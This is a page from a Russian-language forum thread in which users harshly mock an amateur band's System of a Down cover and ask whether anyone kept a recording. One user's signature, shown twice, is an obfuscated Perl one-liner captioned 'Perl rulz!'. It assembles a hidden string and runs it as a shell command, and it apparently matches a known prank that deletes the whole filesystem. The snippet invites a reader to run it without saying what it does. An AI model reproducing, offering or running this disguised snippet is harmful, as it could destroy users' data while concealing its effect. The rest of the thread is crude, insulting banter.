Добавлено: Вс Авг 06, 2006 4:29 am Заголовок сообщения:
мда)))) ну на гитаре они наверно лучше меня играют тока потомучто я гитары в руках никогда не держал)))) но пою я наверно все таки лучше)))) аврыль тоже!!!!))))) короче я правильно сделал что досрочно за оццтой голосовал
"свою" песню походу тоже помойму из кусочков соад слепили))) больно мотивчик кажется знакомым
О давай те сделаем сольны праект - В.Г. Сторагед + ВАЙТЛАЙТ
я думаю атрымаецца не дрэнна) можна записать вицька калину) _________________ М?р вам п?пл...
Короче так займесь чем нибудь другим музыка это не для вас.
Записали на комп через самый херовый микрофон,на гитаре играете хренова,солист если его так можно назвать, совсем не умеет петь,ну никого голоса и слуха,похоже в детстве медведы очень часто наступали на уши.Произношение англ. языка хуже некуда.
И вообще какая вы группа?2 человека с одной гитарой?
Не прикасайтесь больше к Соад,если бы они это услышали....
Добавлено: Пн Янв 22, 2007 9:05 am Заголовок сообщения:
не было) я не видел по крайней мере) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
А кого-нить сохранилось это дерьмо!? _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!
ммм)) а как архив назывался? мож я не стер) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Часовой пояс: GMT + 4 На страницу Пред.1, 2, 3След.
Страница 2 из 3